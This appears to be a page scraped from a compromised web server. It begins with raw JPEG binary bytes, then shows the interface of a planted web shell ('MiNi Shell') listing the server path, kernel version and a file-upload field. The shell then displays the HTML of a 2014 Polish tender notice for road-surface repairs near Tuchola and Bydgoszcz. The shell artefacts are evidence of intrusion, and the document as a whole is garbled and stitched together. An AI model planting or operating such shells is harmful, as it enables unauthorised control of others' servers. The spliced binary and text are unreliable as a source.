JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140410/122592-N-2014.html

<p class="kh_header"><b>Bydgoszcz: Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW Tuchola w  2014r</b><br>
<b>Numer ogłoszenia: 122592 - 2014; data zamieszczenia: 10.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW Tuchola w  2014r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW Tuchola 
w 2014r. 

2. 	Ze względu na rozległy obszar objęty zamówieniem a także trudności w przypadku przemieszczania się sprzętu - całe zamówienie podzielono na 2 części: 

2.1 w części I objęto drogi wojewódzkie:
              Nr 237  - Czersk - Mąkowarsko  od km   7+006 do km 37+400=30,394 km
                                              od km  41+900 do km 47+405= 5,505 km
 Nr 240  - Chojnice - Świecie       od km  18+000 do km 45+989=27,989 km
Nr 241  - Tuchola - Więcbork     od km   0+000 do km 26+369=26,396 km
                                               od km  28+469 do km 41+831=13,362 km
                                                       Łącznie długość dróg -  103,646 km

2.2 w części II objęto drogi wojewódzkie:
     Nr 189  - Jastrowie - Więcbork       od km 33+255 do km 50+151=16,896 km
     Nr 223  - Bydgoszcz - Białe Błota  od km  2+800 do km  4+900=2,100 km
     Nr 241  - Więcbork - Głogowiniec  od km 41+831 do km 62+732=20,901 km
                                     od km 69+898 do km 69+959=0,061 km
                                    od km 83+703 do km 88+720=5,017 km
                                    od km 89+263 do km 94+039=4,776 km
      Nr 242  - Więcbork - Łobżenica    od km  0+255 do km   8+012=7,757 km
      Nr 243  - Mrocza - Koronowo       od km  8+255 do km 27+184=18,929 km
      Nr 246  - Paterek - Dąbrowa Biskupia  od km  0+000 do km  31+433=31,433 km
                                                  Łącznie długość dróg -    107,870 km


3. 	Zamówienie obejmuje następujący zakres robót dla części I i dla części II:
3.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.2. 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 15 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego.

4. 	Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.

5. 	Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z poźn. zmianami) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego.

6.   Wykonawca zobowiązany jest prowadzić remont cząstkowy i likwidację przełomów 
w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum 
oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia                      np. w przypadku odbywającego się ruchu samochodów ciężarowych oraz w przypadku warunków atmosferycznych /opady deszczu/ mają wpływ na zwiększanie się powierzchni remontów. 
Warunkiem udzielenia zamówień uzupełniających jest posiadanie środków finansowych na ich wykonanie. Na okoliczność wystąpienia zamówień uzupełniających, zostanie zawarta umowa w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 
dla części I - 3.500,00 zł słownie: trzytysięcypięćsetzł00/100złotych
dla części II - 3.500,00 zł słownie: trzytysięcypięćsetzł00/100złotych

2.	Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu wpłacone przelewem w rozumieniu prawa bankowego na konto                     Zamawiającego na rachunek wadiów prowadzony przez PKO BP S.A. nr rachunku: 
16 1020 1475 0000 8302 0093 7482,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych (bezwarunkowo),
d) gwarancjach ubezpieczeniowych (bezwarunkowo),
e) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju                     Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
3.	Wadium należy wnieść przed upływem terminu składania ofert.
	- w przypadku przelewu na rachunek zamawiającego, dowód wniesienia wadium należy załączyć do oferty,
	- w przypadku wniesienia wadium w pozostałych formach należy dokument załączyć 
do oferty.
4. 	Zamawiający zwraca wadium, wszystkim wykonawcom niezwłocznie po wyborze  oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem sytuacji opisanej 
w pkt. VIII.8.
5.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający  zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 
6.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał  ofertę przed upływem terminu do składania ofert.
7.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu     zwrócono wadium w sytuacji opisanej w pkt. VIII.4., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie  wadium w terminie określonym przez Zamawiającego.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
na wezwanie Zamawiającego nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika 
to z przyczyn  nieleżących po jego stronie.
9.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach   określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
	c) zawarcie umowy w sprawie zamówienia publicznego stanie się możliwe z przyczyn leżących po stronie Wykonawcy. 
10. Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób aby jego zwrot przez Zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony w oprawie foliowej), co pozwoli na swobodne oddzielenie wadium od reszty dokumentów.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy posiadający  wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca w celu spełnienia  warunku musi wykazać, że wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył co najmniej po dwa zamówienia na remonty cząstkowe nawierzchni bitumicznych  masą mineralno - asfaltową na gorąco lub emulsją asfaltową i grysami o łącznej  wartości nie mniejszej niż 200.000,00zł brutto dla części I i o łącznej  wartości nie mniejszej niż 200.000,00zł brutto dla części II w ostatnich  
5 latach przed upływem terminu składania ofert a jeżeli okres prowadzenia jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy dysponującym odpowiednim potencjałem technicznym. Wykonawca w celu spełnienia warunku musi wykazać, iż dysponuje na jedną część:
	- wytwórnią mieszanek mineralno - asfaltowych wyposażona w otaczarkę o mieszaniu cyklicznym lub ciągłym z możliwością podgrzewania kruszywa, wyposażoną                               w automatyczny dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż                  120 Mg/h lub sprzętem równoważnym -  1 szt,
- układarką mas bitumicznych wyposażona w sterownik elektroniczny oraz deskę wibracyjną lub sprzętem równoważnym - 1 szt,
	- zagęszczarką płytową lub sprzętem równoważnym - 1 szt,
	- szczotką mechaniczną lub sprzętem równoważnym - 1 szt,
	- samojezdną skrapiarką lepiszcza wyposażoną w urządzenie pomiarowe oraz               mechanizmy regulacyjne, które zapewniają równomierne rozłożenie lepiszcza                 w kierunku podłużnym i poprzecznym lub sprzętem równoważnym - 1 szt,
	- frezarką do nawierzchni lub sprzętem równoważnym -  1 szt,
	- środkami transportu o ładowności pow. 10 ton  lub sprzętem równoważnym - 2 szt,
	- walcem statycznym lub sprzętem równoważnym - 1 szt,
	- walcem ogumionym lub sprzętem równoważnym - 1 szt,
        - malowarka drogowa lub sprzętem równoważnym - 1 szt,
	W przypadku złożenia oferty na dwie części należy spełnić powyższy warunek 
w zakresie dysponowania potencjałem technicznym dla każdej części oddzielnie, za wyjątkiem wytwórni mieszanek mineralno-asfaltowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O wykonanie zamówienia mogą 
ubiegać się wykonawcy dysponujący następującymi osobami zdolnymi do wykonania zamówienia:
- Kierownik budowy - co najmniej 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności.

        W przypadku złożenia oferty na dwie części należy spełnić powyższy warunki 
w zakresie dysponowania osobami zdolnymi do wykonania zamówienia dla każdej 
części oddzielnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za główne roboty budowlane, dla których należy przedstawić dowody uznaje się roboty budowlane niezbędne do spełnienia warunku, o których mowa w pkt V.4. SIWZ tj. co najmniej po dwa zamówienia na remonty cząstkowe                nawierzchni bitumicznych  masą mineralno - asfaltową na gorąco lub emulsją asfaltową i grysami o łącznej  wartości nie mniejszej niż 200.000,00zł brutto dla części I i o łącznej  wartości nie mniejszej niż 200.000,00zł brutto dla części II w ostatnich  
5 latach przed upływem terminu składania ofert a jeżeli okres prowadzenia jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu              zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju,           w którym wykonawca ma siedzibę lub miejsce zamieszkania.  Odnośnie terminów         wystawienia niniejszego dokumentu stosuje się odpowiednio wymagania określone       w pkt. III.4.3.1
2.	Wypełniony i podpisany FORMULARZ OFERTY dla części I/części II (Załącznik 
nr 1 do SIWZ).
3.	Wypełniony i podpisany KOSZTORYS OFERTOWY dla części I/części II (Załącznik 
nr 2 do SIWZ).
4. W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem 
przez notariusza) o ile nie wynika ono z innych dokumentów dołączonych do oferty.
5.	Do oferty wspólnej musi być dołączony dokument wskazujący pełnomocnika 
do reprezentowania wykonawców w postępowaniu i podpisania umowy. Pełnomocnictwo musi wymieniać wszystkich Wykonawców i być przez nich podpisane. Pełnomocnictwo musi jednoznacznie określać postępowanie do którego się odnosi
 i precyzować zakres umocowania. Pełnomocnictwo niniejsze musi być złożone w oryginale lub kopii poświadczonej za zgodność przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego 
na warunkach określonych we wzorze Istotnych Postanowień Umowy 
będącej załącznikiem nr 11 do niniejszej SIWZ, co Wykonawca 
potwierdza w formularzu oferty.
2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian  postanowień zawartej umowy w stosunku do treści oferty, na podstawie której                  dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej                         z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków 
ich wprowadzenia:
2.1.   Zmiana terminu realizacji zamówienia w przypadku: 
a) warunki atmosferyczne odbiegające od typowych (np. długotrwałe, obfite deszcze,  niskie temperatury w dzień i w nocy, przymrozki i inne), uniemożliwiające wykonanie przedmiotu zamówienia zgodnie z SST;
b) zlecania przez Zamawiającego prac dodatkowych jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;  
c) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia  terminowe zakończenie realizacji przedmiotu umowy;
d) zaistnieje siła wyższa

2.2.  	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę 
